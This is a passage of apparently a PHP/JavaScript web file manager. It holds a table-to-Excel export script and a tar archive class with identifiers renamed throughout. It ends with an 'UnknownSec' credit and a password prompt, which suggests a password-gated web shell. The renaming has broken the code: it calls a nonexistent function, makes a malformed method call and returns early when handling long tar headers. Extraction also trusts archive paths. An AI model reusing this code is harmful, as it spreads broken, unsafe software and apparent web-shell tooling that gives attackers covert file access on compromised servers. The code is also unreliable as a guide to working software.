    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',

    format = function(s, c) {
                          
            return s.replace(/{(\w+)}/g, function(m, p) {
                            
                return c[p];
                           
            })

        }
                            
    return function(table, name) {

        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {

            worksheet: name || 'Worksheet',
                          
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")

        }

	            	            t = new Date();
                         
	            	            filename = 'fm_' + t.toISOString() + '.xls'

	            	            download_xls(filename, base64_encode(format(template, ctx)))
    }
                        
})();



var table2Excel = function () {
                            

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");


                            
	            this.CreateExcelSheet = 

	            	            function(el, name){

	            	            	            if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

	            	            	            	            var x = document.getElementById(el).rows;
                          


	            	            	            	            var xls = new ActiveXObject("Excel.Application");



	            	            	            	            xls.visible = true;
                          
	            	            	            	            xls.Workbooks.Add
                          
	            	            	            	            for (i = 0; i < x.length; i++) {
	            	            	            	            	            var y = x[i].cells;


	            	            	            	            	            for (j = 0; j < y.length; j++) {
	            	            	            	            	            	            xls.Cells(i + 1, j + 1).Value = y[j].innerText;

	            	            	            	            	            }

	            	            	            	            }
                         
	            	            	            	            xls.Visible = true;
	            	            	            	            xls.UserControl = true;

	            	            	            	            return xls;

	            	            	            } else {

	            	            	            	            tableToExcelData(el, name);

	            	            	            }

	            	            }
}
                           
</script>

</body>

</html>

<?php

//Ported from ReloadCMS project http://reloadcms.com
                        
class archiveTar {

	            var $ka_nomeArquivo = '';

	            var $ka_arquivoTemp = 0;
	            var $ka_posArquivo = 0;

	            var $ka_estaGzipado = true;

	            var $ki_erro = array();

	            var $ki_arquivos = array();

	            

	            function __construct(){

	            	            if (!isset($this->ki_erro)) $this->ki_erro = array();
	            }

	            
	            function criarArquivo($file_list){
	            	            $result = false;

	            	            if (file_exists($this->ka_nomeArquivo) && is_file($this->ka_nomeArquivo)) 	            $newArchive = false;

	            	            else $newArchive = true;

	            	            if ($newArchive){
	            	            	            if (!$this->abrirEscrita()) return false;
                           
	            	            } else {

	            	            	            if (ki_arquivosize($this->ka_nomeArquivo) == 0)	            return $this->abrirEscrita();
	            	            	            if ($this->ka_estaGzipado) {
                        
	            	            	            	            $this->fecharArquivoTemp();
	            	            	            	            if (!rename($this->ka_nomeArquivo, $this->ka_nomeArquivo.'.tmp')){
	            	            	            	            	            $this->ki_erro[] = __('Cannot rename').' '.$this->ka_nomeArquivo.__(' to ').$this->ka_nomeArquivo.'.tmp';

	            	            	            	            	            return false;

	            	            	            	            }

	            	            	            	            $tmpArchive = gzopen($this->ka_nomeArquivo.'.tmp', 'rb');

	            	            	            	            if (!$tmpArchive){
                         
	            	            	            	            	            $this->ki_erro[] = $this->ka_nomeArquivo.'.tmp '.__('is not readable');

	            	            	            	            	            rename($this->ka_nomeArquivo.'.tmp', $this->ka_nomeArquivo);
                          
	            	            	            	            	            return false;

	            	            	            	            }

	            	            	            	            if (!$this->abrirEscrita()){

	            	            	            	            	            rename($this->ka_nomeArquivo.'.tmp', $this->ka_nomeArquivo);
                         
	            	            	            	            	            return false;

	            	            	            	            }
                         
	            	            	            	            $buffer = gzread($tmpArchive, 512);
                          
	            	            	            	            if (!gzeof($tmpArchive)){

	            	            	            	            	            do {

	            	            	            	            	            	            $binaryData = pack('a512', $buffer);

	            	            	            	            	            	            $this->escreverBloco($binaryData);

	            	            	            	            	            	            $buffer = gzread($tmpArchive, 512);

	            	            	            	            	            }

	            	            	            	            	            while (!gzeof($tmpArchive));

	            	            	            	            }

	            	            	            	            gzclose($tmpArchive);

	            	            	            	            unlink($this->ka_nomeArquivo.'.tmp');

	            	            	            } else {

	            	            	            	            $this->ka_arquivoTemp = fopen($this->ka_nomeArquivo, 'r+b');
	            	            	            	            if (!$this->ka_arquivoTemp)	            return false;
	            	            	            }

	            	            }
	            	            if (isset($file_list) && is_array($file_list)) {
	            	            if (count($file_list)>0)
	            	            	            $result = $this->compactarArrayArquivos($file_list);

	            	            } else $this->ki_erro[] = __('No file').__(' to ').__('Archive');

	            	            if (($result)&&(is_resource($this->ka_arquivoTemp))){

	            	            	            $binaryData = pack('a512', '');
	            	            	            $this->escreverBloco($binaryData);

	            	            }

	            	            $this->fecharArquivoTemp();
	            	            if ($newArchive && !$result){
	            	            $this->fecharArquivoTemp();
	            	            unlink($this->ka_nomeArquivo);
	            	            }
                            
	            	            return $result;

	            }


                         
	            function restaurarArquivo($path){
	            	            $fileName = $this->ka_nomeArquivo;

	            	            if (!$this->ka_estaGzipado){

	            	            	            if (file_exists($fileName)){
                         
	            	            	            	            if ($fp = fopen($fileName, 'rb')){

	            	            	            	            	            $data = fread($fp, 2);

	            	            	            	            	            fclose($fp);
	            	            	            	            	            if ($data == '\37\213'){
	            	            	            	            	            	            $this->ka_estaGzipado = true;

	            	            	            	            	            }

	            	            	            	            }
                          
	            	            	            }
                          
	            	            	            elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->ka_estaGzipado = true;
                        
	            	            } 

	            	            $result = true;

	            	            if ($this->ka_estaGzipado) $this->ka_arquivoTemp = gzopen($fileName, 'rb');

	            	            else $this->ka_arquivoTemp = fopen($fileName, 'rb');
	            	            if (!$this->ka_arquivoTemp){
                         
	            	            	            $this->ki_erro[] = $fileName.' '.__('is not readable');
	            	            	            return false;
                          
	            	            }
	            	            $result = $this->uncompactarArrayArquivos($path);

	            	            	            $this->fecharArquivoTemp();

	            	            return $result;
                        
	            }
                        


	            function mostrarErros	            ($message = '') {
	            	            $Errors = $this->ki_erro;

	            	            if(count($Errors)>0) {

	            	            if (!empty($message)) $message = ' ('.$message.')';

	            	            	            $message = __('Error occurred').$message.': <br/>';

	            	            	            foreach ($Errors as $value)

	            	            	            	            $message .= $value.'<br/>';
	            	            	            return $message;	            
                          
	            	            } else return '';

	            	            

	            }

	            
	            function compactarArrayArquivos($file_array){

	            	            $result = true;

	            	            if (!$this->ka_arquivoTemp){

	            	            	            $this->ki_erro[] = __('Invalid file descriptor');

	            	            	            return false;

	            	            }
	            	            if (!is_array($file_array) || count($file_array)<=0)
          return true;

	            	            for ($i = 0; $i<count($file_array); $i++){
                            
	            	            	            $filename = $file_array[$i];

	            	            	            if ($filename == $this->ka_nomeArquivo)

	            	            	            	            continue;

	            	            	            if (strlen($filename)<=0)

	            	            	            	            continue;

	            	            	            if (!file_exists($filename)){

	            	            	            	            $this->ki_erro[] = __('No file').' '.$filename;

	            	            	            	            continue;

	            	            	            }

	            	            	            if (!$this->ka_arquivoTemp){

	            	            	            $this->ki_erro[] = __('Invalid file descriptor');

	            	            	            return false;

	            	            	            }
                          
	            	            if (strlen($filename)<=0){
	            	            	            $this->ki_erro[] = __('Filename').' '.__('is incorrect');;
	            	            	            return false;

	            	            }
                         
	            	            $filename = str_replace('\\', '/', $filename);
                         
	            	            $keep_filename = $this->criarCaminhoValido($filename);
                         
	            	            if (is_file($filename)){
                            
	            	            	            if (($file_detects = fopen($filename, 'rb')) == 0){

	            	            	            	            $this->ki_erro[] = __('Mode ').__('is incorrect');
                        
	            	            	            }
                        
	            	            	            	            if(($this->ka_posArquivo == 0)){
                            
	            	            	            	            	            if(!$this->escreverCabecalho($filename, $keep_filename))

	            	            	            	            	            	            return false;
	            	            	            	            }
	            	            	            	            while (($buffer = fread($file_detects, 512)) != ''){
	            	            	            	            	            $binaryData = pack('a512', $buffer);

	            	            	            	            	            $this->escreverBloco($binaryData);
	            	            	            	            }

	            	            	            fclose($file_detects);
	            	            }	            else $this->escreverCabecalho($filename, $keep_filename);
	            	            	            if (@is_dir($filename)){

	            	            	            	            if (!($handle = opendir($filename))){

	            	            	            	            	            $this->ki_erro[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
	            	            	            	            	            continue;
	            	            	            	            }
                          
	            	            	            	            while (false !== ($dir = readdir($handle))){
                        
	            	            	            	            	            if ($dir!='.' && $dir!='..'){
	            	            	            	            	            	            $file_array_tmp = array();
                           
	            	            	            	            	            	            if ($filename != '.')
                           
	            	            	            	            	            	            	            $file_array_tmp[] = $filename.'/'.$dir;

	            	            	            	            	            	            else
                        
	            	            	            	            	            	            	            $file_array_tmp[] = $dir;
                         


	            	            	            	            	            	            $result = $this->compactarArrayArquivos($file_array_tmp);
                           
	            	            	            	            	            }

	            	            	            	            }

	            	            	            	            unset($file_array_tmp);

	            	            	            	            unset($dir);
                        
	            	            	            	            unset($handle);
	            	            	            }

	            	            }
                           
	            	            return $result;
	            }



	            function uncompactarArrayArquivos($path){ 

	            	            $path = str_replace('\\', '/', $path);

	            	            if ($path == ''	            || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	            $path = './'.$path;

	            	            clearstatcache();
                           
	            	            while (strlen($binaryData = $this->lerBloco()) != 0){
                           
	            	            	            if (!$this->lerCabecalho($binaryData, $header)) return false;
                        
	            	            	            if ($header['filename'] == '') continue;

	            	            	            if ($header['typeflag'] == 'L'){	            	            	            //reading long header
                        
	            	            	            	            $filename = '';
	            	            	            	            $decr = floor($header['size']/512);

	            	            	            	            for ($i = 0; $i < $decr; $i++){

	            	            	            	            	            $content = $this->lerBloco();

	            	            	            	            	            $filename .= $content;

	            	            	            	            }

	            	            	            	            if (($laspiece = $header['size'] % 512) != 0){
                         
	            	            	            	            	            $content = $this->lerBloco();

	            	            	            	            	            $filename .= substr($content, 0, $laspiece);
	            	            	            	            }
                        
	            	            	            	            $binaryData = $this->lerBloco();
	            	            	            	            if (!$this->lerCabecalho($binaryData, $header)) return false;

	            	            	            	            else $header['filename'] = $filename;

	            	            	            	            return true;

	            	            	            }

	            	            	            if (($path != './') && ($path != '/')){

	            	            	            	            while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
                            
	            	            	            	            if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];

	            	            	            	            else $header['filename'] = $path.'/'.$header['filename'];

	            	            	            }

	            	            	            
                           
	            	            	            if (file_exists($header['filename'])){

	            	            	            	            if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
                         
	            	            	            	            	            $this->ki_erro[] =__('File ').$header['filename'].__(' already exists').__(' as folder');

	            	            	            	            	            return false;
	            	            	            	            }

	            	            	            	            if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
                            
	            	            	            	            	            $this->ki_erro[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
                            
	            	            	            	            	            return false;
                         
	            	            	            	            }
                            
	            	            	            	            if (!is_writeable($header['filename'])){

	            	            	            	            	            $this->ki_erro[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
	            	            	            	            	            return false;
	            	            	            	            }
	            	            	            } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
                         
	            	            	            	            $this->ki_erro[] = __('Cannot create directory').' '.__(' for ').$header['filename'];

	            	            	            	            return false;
	            	            	            }



	            	            	            if ($header['typeflag'] == '5'){
	            	            	            	            if (!file_exists($header['filename']))	            	            {
                         
	            	            	            	            	            if (!mkdir($header['filename'], 0777))	            {

	            	            	            	            	            	            

	            	            	            	            	            	            $this->ki_erro[] = __('Cannot create directory').' '.$header['filename'];

	            	            	            	            	            	            return false;

	            	            	            	            	            } 

	            	            	            	            }

	            	            	            } else {
                        
	            	            	            	            if (($destination = fopen($header['filename'], 'wb')) == 0) {

	            	            	            	            	            $this->ki_erro[] = __('Cannot write to file').' '.$header['filename'];

	            	            	            	            	            return false;
	            	            	            	            } else {

	            	            	            	            	            $decr = floor($header['size']/512);
	            	            	            	            	            for ($i = 0; $i < $decr; $i++) {

	            	            	            	            	            	            $content = $this->lerBloco();

	            	            	            	            	            	            fwrite($destination, $content, 512);
	            	            	            	            	            }

	            	            	            	            	            if (($header['size'] % 512) != 0) {

	            	            	            	            	            	            $content = $this->lerBloco();
                           
	            	            	            	            	            	            fwrite($destination, $content, ($header['size'] % 512));
                           
	            	            	            	            	            }

	            	            	            	            	            fclose($destination);
                         
	            	            	            	            	            touch($header['filename'], $header['time']);
                          
	            	            	            	            }

	            	            	            	            clearstatcache();
                         
	            	            	            	            if (ki_arquivosize($header['filename']) != $header['size']) {
	            	            	            	            	            $this->ki_erro[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
                            
	            	            	            	            	            return false;
                           
	            	            	            	            }
                            
	            	            	            }

	            	            	            if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';

	            	            	            if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
	            	            	            $this->dirs[] = $file_dir;
                            
	            	            	            $this->ki_arquivos[] = $header['filename'];
	            

	            	            }
	            	            return true;
	            }


	            function dirCheck($dir){

	            	            $parent_dir = dirname($dir);


	            	            if ((@is_dir($dir)) or ($dir == ''))

	            	            	            return true;
                            

	            	            if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
                            
	            	            	            return false;
                            


	            	            if (!mkdir($dir, 0777)){
                          
	            	            	            $this->ki_erro[] = __('Cannot create directory').' '.$dir;
                          
	            	            	            return false;
	            	            }
                           
	            	            return true;

	            }
                          


	            function lerCabecalho($binaryData, &$header){
                          
	            	            if (strlen($binaryData)==0){
	            	            	            $header['filename'] = '';
	            	            	            return true;
                        
	            	            }



	            	            if (strlen($binaryData) != 512){
	            	            	            $header['filename'] = '';
	            	            	            $this->__('Invalid block size').': '.strlen($binaryData);

	            	            	            return false;

	            	            }
                         


	            	            $ka_chequeIntegridade = 0;
                        
	            	            for ($i = 0; $i < 148; $i++) $ka_chequeIntegridade+=ord(substr($binaryData, $i, 1));

	            	            for ($i = 148; $i < 156; $i++) $ka_chequeIntegridade += ord(' ');

	            	            for ($i = 156; $i < 512; $i++) $ka_chequeIntegridade+=ord(substr($binaryData, $i, 1));


	            	            $unpack_data = unpack('a100filename/a8mode/a8ka_idUsuario/a8group_id/a12size/a12time/a8ka_chequeIntegridade/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);
                        

	            	            $header['ka_chequeIntegridade'] = OctDec(trim($unpack_data['ka_chequeIntegridade']));

	            	            if ($header['ka_chequeIntegridade'] != $ka_chequeIntegridade){

	            	            	            $header['filename'] = '';
                            
	            	            	            if (($ka_chequeIntegridade == 256) && ($header['ka_chequeIntegridade'] == 0)) 	            return true;

	            	            	            $this->ki_erro[] = __('Error ka_chequeIntegridade for file ').$unpack_data['filename'];
                        
	            	            	            return false;
	            	            }


                        
	            	            if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	            $header['size'] = 0;

	            	            $header['filename'] = trim($unpack_data['filename']);
                        
	            	            $header['mode'] = OctDec(trim($unpack_data['mode']));

	            	            $header['ka_idUsuario'] = OctDec(trim($unpack_data['ka_idUsuario']));
                           
	            	            $header['group_id'] = OctDec(trim($unpack_data['group_id']));

	            	            $header['size'] = OctDec(trim($unpack_data['size']));
	            	            $header['time'] = OctDec(trim($unpack_data['time']));
	            	            return true;
                            
	            }


                        
	            function escreverCabecalho($filename, $keep_filename){

	            	            $packF = 'a100a8a8a8a12A12';
	            	            $packL = 'a1a100a6a2a32a32a8a8a155a12';

	            	            if (strlen($keep_filename)<=0) $keep_filename = $filename;
                        
	            	            $filename_ready = $this->criarCaminhoValido($keep_filename);


	            	            if (strlen($filename_ready) > 99){	            	            	            	            	            	            	            //write long header
                            
	            	            $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
	            	            $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');



        //  Calculate the ka_chequeIntegridade
	            	            $ka_chequeIntegridade = 0;

        //  First part of the header
	            	            for ($i = 0; $i < 148; $i++)

	            	            	            $ka_chequeIntegridade += ord(substr($dataFirst, $i, 1));

        //  Ignore the ka_chequeIntegridade value and replace it by ' ' (space)

	            	            for ($i = 148; $i < 156; $i++)

	            	            	            $ka_chequeIntegridade += ord(' ');

        //  Last part of the header

	            	            for ($i = 156, $j=0; $i < 512; $i++, $j++)

	            	            	            $ka_chequeIntegridade += ord(substr($dataLast, $j, 1));

        //  Write the first 148 bytes of the header in the archive
	            	            $this->escreverBloco($dataFirst, 148);
                         
        //  Write the calculated ka_chequeIntegridade
	            	            $ka_chequeIntegridade = sprintf('%6s ', DecOct($ka_chequeIntegridade));
                        
	            	            $binaryData = pack('a8', $ka_chequeIntegridade);
	            	            $this->escreverBloco($binaryData, 8);

        //  Write the last 356 bytes of the header in the archive
	            	            $this->escreverBloco($dataLast, 356);



	            	            $ka_arquivoTempname = $this->criarCaminhoValido($filename_ready);



	            	            $i = 0;

	            	            	            while (($buffer = substr($ka_arquivoTempname, (($i++)*512), 512)) != ''){

	            	            	            	            $binaryData = pack('a512', $buffer);
	            	            	            	            $this->escreverBloco($binaryData);

	            	            	            }

	            	            return true;

	            	            }
	            	            $file_info = stat($filename);

	            	            if (@is_dir($filename)){
                        
	            	            	            $typeflag = '5';
                            
	            	            	            $size = sprintf('%11s ', DecOct(0));

	            	            } else {

	            	            	            $typeflag = '';
                           
	            	            	            clearstatcache();

	            	            	            $size = sprintf('%11s ', DecOct(ki_arquivosize($filename)));

	            	            }

	            	            $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
	            	            $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
                          
	            	            $ka_chequeIntegridade = 0;

	            	            for ($i = 0; $i < 148; $i++) $ka_chequeIntegridade += ord(substr($dataFirst, $i, 1));

	            	            for ($i = 148; $i < 156; $i++) $ka_chequeIntegridade += ord(' ');
                           
	            	            for ($i = 156, $j = 0; $i < 512; $i++, $j++) $ka_chequeIntegridade += ord(substr($dataLast, $j, 1));
	            	            $this->escreverBloco($dataFirst, 148);

	            	            $ka_chequeIntegridade = sprintf('%6s ', DecOct($ka_chequeIntegridade));

	            	            $binaryData = pack('a8', $ka_chequeIntegridade);

	            	            $this->escreverBloco($binaryData, 8);

	            	            $this->escreverBloco($dataLast, 356);
                         
	            	            return true;
                        
	            }


	            function abrirEscrita(){

	            	            if ($this->ka_estaGzipado)
                          
	            	            	            $this->ka_arquivoTemp = gzopen($this->ka_nomeArquivo, 'wb9f');

	            	            else
                           
	            	            	            $this->ka_arquivoTemp = fopen($this->ka_nomeArquivo, 'wb');



	            	            if (!($this->ka_arquivoTemp)){
                            
	            	            	            $this->ki_erro[] = __('Cannot write to file').' '.$this->ka_nomeArquivo;
	            	            	            return false;
	            	            }
	            	            return true;

	            }
                         


	            function lerBloco(){

	            	            if (is_resource($this->ka_arquivoTemp)){
	            	            	            if ($this->ka_estaGzipado)

	            	            	            	            $block = gzread($this->ka_arquivoTemp, 512);
                          
	            	            	            else

	            	            	            	            $block = fread($this->ka_arquivoTemp, 512);
                        
	            	            } else	            $block = '';
                         


	            	            return $block;

	            }


	            function escreverBloco($data, $length = 0){
                        
	            	            if (is_resource($this->ka_arquivoTemp)){

	            	            

	            	            	            if ($length === 0){

	            	            	            	            if ($this->ka_estaGzipado)

	            	            	            	            	            gzputs($this->ka_arquivoTemp, $data);
                         
	            	            	            	            else

	            	            	            	            	            fputs($this->ka_arquivoTemp, $data);
                           
	            	            	            } else {
	            	            	            	            if ($this->ka_estaGzipado)

	            	            	            	            	            gzputs($this->ka_arquivoTemp, $data, $length);
	            	            	            	            else
                         
	            	            	            	            	            fputs($this->ka_arquivoTemp, $data, $length);
                          
	            	            	            }
	            	            }

	            }



	            function fecharArquivoTemp(){
                           
	            	            if (is_resource($this->ka_arquivoTemp)){
                            
	            	            	            if ($this->ka_estaGzipado)
                        
	            	            	            	            gzclose($this->ka_arquivoTemp);
	            	            	            else

	            	            	            	            fclose($this->ka_arquivoTemp);

                         
	            	            	            $this->ka_arquivoTemp = 0;

	            	            }
	            }


                            
	            function criarCaminhoValido($path){

	            	            if (strlen($path)>0){
	            	            	            $path = str_replace('\\', '/', $path);
	            	            	            $partPath = explode('/', $path);
                           
	            	            	            $els = count($partPath)-1;
	            	            	            for ($i = $els; $i>=0; $i--){
	            	            	            	            if ($partPath[$i] == '.'){

                    //  Ignore this directory

                } elseif ($partPath[$i] == '..'){

                    $i--;
                           
                }
	            	            	            	            elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                            
                }	            else
	            	            	            	            	            $result = $partPath[$i].($i!=$els ? '/'.$result : '');
                          
	            	            	            }
                           
	            	            } else $result = '';
                          
	            	            
                            
	            	            return $result;
                            
	            }
                         
}

?>

© 2025 UnknownSec
afwwrfwafr45458465
Password